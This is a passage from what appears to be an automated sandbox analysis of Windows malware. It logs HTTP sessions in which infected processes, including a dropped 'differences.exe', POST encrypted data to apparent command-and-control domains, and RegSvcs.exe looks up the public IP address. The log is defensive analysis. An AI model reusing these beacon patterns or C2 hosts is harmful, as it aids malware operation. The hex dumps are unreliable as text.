                                                                                                                                                Data Ascii: ?8pF`W-'M+fxXy+\2JYqP6 Z Rhebs\3N N81Y%,K,v/08b#J*elqV^+cn aAoi/1$shL?J6T*z4uyWN](n{1JFc({
                                                                                                                                                Dec 2, 2024 07:56:17.491005898 CET412INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: btst=47e396f0b0db7b0277ce71b5c8c78bea|8.46.123.228|1733122577|1733122577|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                6192.168.2.449738172.234.222.138807412C:\Windows\System32\alg.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 2, 2024 07:56:18.137799978 CET357OUTPOST /widfafwxfswrij HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Host: przvgke.biz
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                Content-Length: 778
                                                                                                                                                Dec 2, 2024 07:56:18.137904882 CET778OUTData Raw: f5 a7 2e 35 f4 2c 59 c6 fe 02 00 00 81 18 60 e4 53 cc 17 e0 4f 67 c0 fe 3d 0a bd f0 78 fa af 95 f7 2d 0e ed 47 ee ff 0d 03 28 54 fa 1c b4 40 38 c5 d7 94 97 85 5f 0c 7d 49 6b a7 c7 71 8a e9 e2 f8 d6 31 46 36 17 3f 1f 8d 9a 74 e2 ac 62 ac 43 a3 48
                                                                                                                                                Data Ascii: .5,Y`SOg=x-G(T@8_}Ikq1F6?tbCHXPz`A?d'C;]'oM~8bP2B6?z3t|^85abonZH7#Tkyi45NmFq KMKL{F;/p8NA}l(]
                                                                                                                                                Dec 2, 2024 07:56:19.299092054 CET476INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: openresty
                                                                                                                                                Date: Mon, 02 Dec 2024 06:56:19 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 142
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                Location: http://ww99.przvgke.biz/widfafwxfswrij
                                                                                                                                                Cache-Control: no-store, max-age=0
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                Dec 2, 2024 07:56:22.955192089 CET348OUTPOST /jenyp HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Host: przvgke.biz
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                Content-Length: 778
                                                                                                                                                Dec 2, 2024 07:56:22.955224991 CET778OUTData Raw: 24 1f 08 ee cb 31 fb dd fe 02 00 00 cd c5 d1 1f a6 b5 d7 f4 d5 71 e5 ae 02 18 b5 d8 47 6a 5f 2c dc 8c 7a 95 20 cf 1c 8e 63 cf 3e 39 67 28 7b ce 1a f8 34 1c 2f 4b 50 3c 04 7a 3f 12 b3 10 b4 90 fc fa ec 9e 5b d3 25 5e 09 e2 96 bc df cf 94 59 30 fd
                                                                                                                                                Data Ascii: $1qGj_,z c>9g({4/KP<z?[%^Y0BF@<>x'U8@%fyZ9ua3~^L`\?@GH+NA'W~T~V6]$|uKuP~cfN(\'/nG|w{rrZ%k"0|
                                                                                                                                                Dec 2, 2024 07:56:23.303093910 CET467INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: openresty
                                                                                                                                                Date: Mon, 02 Dec 2024 06:56:23 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 142
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                Location: http://ww99.przvgke.biz/jenyp
                                                                                                                                                Cache-Control: no-store, max-age=0
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                7192.168.2.44974072.52.179.174807412C:\Windows\System32\alg.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 2, 2024 07:56:19.839653015 CET340OUTGET /widfafwxfswrij HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                Host: ww99.przvgke.biz
                                                                                                                                                Dec 2, 2024 07:56:21.104057074 CET287INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Date: Mon, 02 Dec 2024 06:56:20 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 0
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: http://ww7.przvgke.biz/widfafwxfswrij?usid=26&utid=9204703590
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                Dec 2, 2024 07:56:23.322401047 CET331OUTGET /jenyp HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                Host: ww99.przvgke.biz
                                                                                                                                                Dec 2, 2024 07:56:23.715461016 CET279INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Date: Mon, 02 Dec 2024 06:56:23 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 0
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: http://ww12.przvgke.biz/jenyp?usid=26&utid=9204704395
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Access-Control-Allow-Origin: *


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                8192.168.2.449742199.59.243.227807412C:\Windows\System32\alg.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 2, 2024 07:56:21.940155983 CET363OUTGET /widfafwxfswrij?usid=26&utid=9204703590 HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                Host: ww7.przvgke.biz
                                                                                                                                                Dec 2, 2024 07:56:22.876645088 CET1236INHTTP/1.1 200 OK
                                                                                                                                                date: Mon, 02 Dec 2024 06:56:22 GMT
                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                content-length: 1146
                                                                                                                                                x-request-id: 0becd7c5-e41d-4b5b-a6a4-c552f2fb6539
                                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rMRrSltRJGGCoRInNFzFwrFLP6vcGf9ef1cI4JUhJJNL11qoZJhu3ianJ4nRSz1Ti/U2pYGOfIDwDlYcIeY3dw==
                                                                                                                                                set-cookie: parking_session=0becd7c5-e41d-4b5b-a6a4-c552f2fb6539; expires=Mon, 02 Dec 2024 07:11:22 GMT; path=/
                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 4d 52 72 53 6c 74 52 4a 47 47 43 6f 52 49 6e 4e 46 7a 46 77 72 46 4c 50 36 76 63 47 66 39 65 66 31 63 49 34 4a 55 68 4a 4a 4e 4c 31 31 71 6f 5a 4a 68 75 33 69 61 6e 4a 34 6e 52 53 7a 31 54 69 2f 55 32 70 59 47 4f 66 49 44 77 44 6c 59 63 49 65 59 33 64 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rMRrSltRJGGCoRInNFzFwrFLP6vcGf9ef1cI4JUhJJNL11qoZJhu3ianJ4nRSz1Ti/U2pYGOfIDwDlYcIeY3dw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                Dec 2, 2024 07:56:22.876770020 CET580INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGJlY2Q3YzUtZTQxZC00YjViLWE2YTQtYzU1MmYyZmI2NTM5IiwicGFnZV90aW1lIjoxNzMzMTIyNTgyLCJwYWdlX3VybCI6I


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                9192.168.2.44974454.244.188.177807824C:\Users\user\AppData\Local\subpredicate\differences.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 2, 2024 07:56:22.828371048 CET347OUTPOST /hx HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Host: pywolwnvd.biz
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                Content-Length: 842
                                                                                                                                                Dec 2, 2024 07:56:22.828392029 CET842OUTData Raw: 64 70 a3 33 7b 6a 39 29 3e 03 00 00 69 40 0b 5e e6 66 bf 03 9b a5 ea a8 6c 7a 88 06 18 83 c2 4c 3b ce 24 8b 42 b2 c6 ce b7 96 9c f4 15 d3 d4 5c 31 31 a5 db cd 36 6b d5 38 8e a6 e2 cf 03 8c 5d f0 e5 62 78 83 fb c9 79 66 5e 7e e6 b0 1e d1 97 75 72
                                                                                                                                                Data Ascii: dp3{j9)>i@^flzL;$B\116k8]bxyf^~ur!T <^GDE0'njy-:2KA"#`tc251L;kYtt=t\-"6[$}R>[-Gc_w>G*>X
                                                                                                                                                Dec 2, 2024 07:56:24.211800098 CET413INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 02 Dec 2024 06:56:23 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: btst=6664838dda604d8489eab6e8e9d657c3|8.46.123.228|1733122583|1733122583|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                10192.168.2.44974613.248.148.254807412C:\Windows\System32\alg.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 2, 2024 07:56:24.334875107 CET355OUTGET /jenyp?usid=26&utid=9204704395 HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                Host: ww12.przvgke.biz
                                                                                                                                                Dec 2, 2024 07:56:25.686561108 CET825INHTTP/1.1 200 OK
                                                                                                                                                Accept-Ch: viewport-width
                                                                                                                                                Accept-Ch: dpr
                                                                                                                                                Accept-Ch: device-memory
                                                                                                                                                Accept-Ch: rtt
                                                                                                                                                Accept-Ch: downlink
                                                                                                                                                Accept-Ch: ect
                                                                                                                                                Accept-Ch: ua
                                                                                                                                                Accept-Ch: ua-full-version
                                                                                                                                                Accept-Ch: ua-platform
                                                                                                                                                Accept-Ch: ua-platform-version
                                                                                                                                                Accept-Ch: ua-arch
                                                                                                                                                Accept-Ch: ua-model
                                                                                                                                                Accept-Ch: ua-mobile
                                                                                                                                                Accept-Ch-Lifetime: 30
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Date: Mon, 02 Dec 2024 06:56:25 GMT
                                                                                                                                                Server: Caddy
                                                                                                                                                Server: nginx
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_C2dUGRDxFOAyAoYhIlQhGKJ5kId4Ic2dCDtaycXMGj9OKotzzqE9GzFgtYlYEOJITSikNr3yli0+AoPz4kyEZw==
                                                                                                                                                X-Domain: przvgke.biz
                                                                                                                                                X-Pcrew-Blocked-Reason:
                                                                                                                                                X-Pcrew-Ip-Organization: CenturyLink
                                                                                                                                                X-Subdomain: ww12
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Dec 2, 2024 07:56:25.686814070 CET1236INData Raw: 33 63 32 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44
                                                                                                                                                Data Ascii: 3c2e<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_C2dUGRDxFOAyAoYhIlQhGKJ5kId4Ic2dCDtaycXMGj9OKotzzqE9GzFgtYlYEOJITSikN
                                                                                                                                                Dec 2, 2024 07:56:25.686840057 CET1236INData Raw: 67 69 6e 3a 30 20 30 20 33 70 78 20 32 30 70 78 3b 0a 7d 0a 0a 2e 73 69 74 65 6c 69 6e 6b 48 6f 6c 64 65 72 20 7b 0a 09 6d 61 72 67 69 6e 3a 2d 31 35 70 78 20 30 20 31 35 70 78 20 33 35 70 78 3b 0a 7d 0a 0a 23 61 6a 61 78 6c 6f 61 64 65 72 48 6f
                                                                                                                                                Data Ascii: gin:0 0 3px 20px;}.sitelinkHolder {margin:-15px 0 15px 35px;}#ajaxloaderHolder {display: block;width: 24px;height: 24px;background: #fff;padding: 8px 0 0 8px;margin:10px auto;-webkit-border-radius: 4px;-moz-border-radiu
                                                                                                                                                Dec 2, 2024 07:56:25.686851978 CET448INData Raw: 3b 0a 7d 0a 0a 2e 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 36 32 36 35 37 34 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 32 72 65 6d 20 31 72 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 72 65 6d 3b 0a 20 20 20 20
                                                                                                                                                Data Ascii: ;}.footer { color:#626574; padding:2rem 1rem; font-size:.8rem; margin:0 auto; max-width:440px;}.footer a:link,.footer a:visited { color:#626574;}.sale_link_bold a,.sale_link,.sale_link a { color:#626574
                                                                                                                                                Dec 2, 2024 07:56:25.686978102 CET1236INData Raw: 20 20 20 20 63 6f 6c 6f 72 3a 20 23 38 34 38 34 38 34 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 63 6f 6d 70 2d 73 70 6f 6e 73 6f 72 65 64 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
                                                                                                                                                Data Ascii: color: #848484; } .comp-sponsored { margin-left: 0; } .wrapper1 { max-width:1500px; margin-left:auto; margin-right:auto; } .wrapper2 { background:url('//d38psrni17bvxu.cloudf
                                                                                                                                                Dec 2, 2024 07:56:25.686990023 CET1236INData Raw: 49 30 49 6a 34 38 63 47 46 30 61 43 42 6b 50 53 4a 4e 4d 43 41 77 61 44 49 30 64 6a 49 30 53 44 42 36 49 69 42 6d 61 57 78 73 50 53 4a 75 62 32 35 6c 49 69 38 2b 50 48 42 68 64 47 67 67 5a 44 30 69 54 54 55 75 4f 44 67 67 4e 43 34 78 4d 6b 77 78
                                                                                                                                                Data Ascii: I0Ij48cGF0aCBkPSJNMCAwaDI0djI0SDB6IiBmaWxsPSJub25lIi8+PHBhdGggZD0iTTUuODggNC4xMkwxMy43NiAxMmwtNy44OCA3Ljg4TDggMjJsMTAtMTBMOCAyeiIvPjwvc3ZnPg==');}</style> </head><body id="afd"><div id="plBanner"><script id="parklogic" type="text/j
                                                                                                                                                Dec 2, 2024 07:56:25.687052965 CET1236INData Raw: 27 3a 20 33 2c 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 2f 2f 20 46 6f 6e 74 2d 53 69 7a 65 73 20 61 6e 64 20 4c 69 6e 65 2d 48 65 69 67 68 74 73 0a 20 20 20 20 20 20 20 20 27 66 6f 6e 74 53 69 7a 65 41 74 74 72 69 62 75 74 69 6f 6e
                                                                                                                                                Data Ascii: ': 3, // Font-Sizes and Line-Heights 'fontSizeAttribution': 14, 'fontSizeTitle': 24, 'lineHeightTitle': 34, // Colors 'colorAttribution': '#aaa', 'colorTitleLink': '#0277bd',
                                                                                                                                                Dec 2, 2024 07:56:25.687172890 CET1236INData Raw: 5a 54 49 33 4d 6d 46 38 66 48 78 38 66 44 46 38 66 44 42 38 4d 48 78 38 66 48 77 78 66 48 78 38 66 48 77 77 66 44 42 38 66 48 78 38 66 48 78 38 66 46 70 49 51 58 52 6b 52 31 5a 6f 59 6c 64 73 64 57 52 48 56 6e 6c 69 62 56 59 77 54 56 52 4b 5a 6b
                                                                                                                                                Data Ascii: ZTI3MmF8fHx8fDF8fDB8MHx8fHwxfHx8fHwwfDB8fHx8fHx8fFpIQXRkR1ZoYldsdWRHVnlibVYwTVRKZk0zQm98YWQ3M2E5NjdiNGEzOThlOGUxN2Y0ODdkODQ0YWE3ZTU5YTMxNDFmZXwwfDB8fDB8fHwwfDB8VzEwPXx8MXxXMTA9fDgzNjhlZGQ1ZDJhMGY5NDNiODcwYmNkZThhNzZjOTMzMzMxNDRjMGN8MHxkcC10ZWF
                                                                                                                                                Dec 2, 2024 07:56:25.687200069 CET1236INData Raw: 6e 74 61 69 6e 65 72 4e 61 6d 65 2c 61 64 73 4c 6f 61 64 65 64 3a 20 61 64 73 4c 6f 61 64 65 64 2c 69 73 45 78 70 65 72 69 6d 65 6e 74 56 61 72 69 61 6e 74 3a 20 69 73 45 78 70 65 72 69 6d 65 6e 74 56 61 72 69 61 6e 74 2c 63 61 6c 6c 62 61 63 6b
                                                                                                                                                Data Ascii: ntainerName,adsLoaded: adsLoaded,isExperimentVariant: isExperimentVariant,callbackOptions: callbackOptions,terms: pageOptions.terms};if (!adsLoaded || (containerName in containerNames)) {ajaxQuery(scriptPath + "/track.php"+ "?toggle=adloaded"+
                                                                                                                                                Dec 2, 2024 07:56:25.687211990 CET1236INData Raw: 72 65 64 20 3d 20 74 72 75 65 3b 69 66 20 28 74 79 70 65 6f 66 20 6c 6f 61 64 46 65 65 64 20 3d 3d 3d 20 22 66 75 6e 63 74 69 6f 6e 22 29 20 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 2f 2f 27 20 2b 20 6c 6f 63 61
                                                                                                                                                Data Ascii: red = true;if (typeof loadFeed === "function") {window.location.href = '//' + location.host;}}if (status.error_code == 20) {window.location.replace("//dp.g.doubleclick.net/apps/domainpark/domainpark.cgi?client=" + encodeURIComponent((pageOptio
                                                                                                                                                Dec 2, 2024 07:56:25.807101965 CET1236INData Raw: 73 74 61 74 75 73 2e 66 65 65 64 29 20 2b 20 22 26 75 69 64 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 75 6e 69 71 75 65 54 72 61 63 6b 69 6e 67 49 44 29 29 3b 7d 69 66 20 28 73 74 61 74 75 73 2e 65 72 72 6f 72 5f 63
                                                                                                                                                Data Ascii: status.feed) + "&uid=" + encodeURIComponent(uniqueTrackingID));}if (status.error_code) {ajaxQuery(scriptPath + "/track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=answercheck&answer=error_" + encodeURIComponent(status.error_code


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                11192.168.2.44974754.244.188.177807896C:\Users\user\AppData\Local\subpredicate\differences.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 2, 2024 07:56:25.078569889 CET349OUTPOST /nwqf HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Host: pywolwnvd.biz
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                Content-Length: 842
                                                                                                                                                Dec 2, 2024 07:56:25.078569889 CET842OUTData Raw: 17 db f5 2b eb b0 c0 28 3e 03 00 00 1a 1d 81 82 d4 af 55 f6 39 d9 d8 39 9e 4c 93 1e 44 8c 60 1d 33 1b ff 65 7c ab 36 5e a7 c0 c2 b1 dc 21 38 86 06 88 2f d0 30 7a 89 87 c8 96 9a 84 17 f2 6c d8 cd d8 4a e9 75 5a 3c dc dd d7 ba 8f e5 ce 2d 96 48 3d
                                                                                                                                                Data Ascii: +(>U99LD`3e|6^!8/0zlJuZ<-H=[%_%dl(+L^t?%3+/nl&am]W,[GQX13*pQQ]<TE^%5TghdP`-txa%.9PM%Vt3Rx


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                12192.168.2.449749193.122.130.0808008C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 2, 2024 07:56:25.769506931 CET151OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Dec 2, 2024 07:56:27.322065115 CET321INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 02 Dec 2024 06:56:27 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 104
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Request-ID: 48104a577bb97c1f24916c12e90bfcb1
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
                                                                                                                                                Dec 2, 2024 07:56:27.328289986 CET127OUTGET / HTTP/1.1
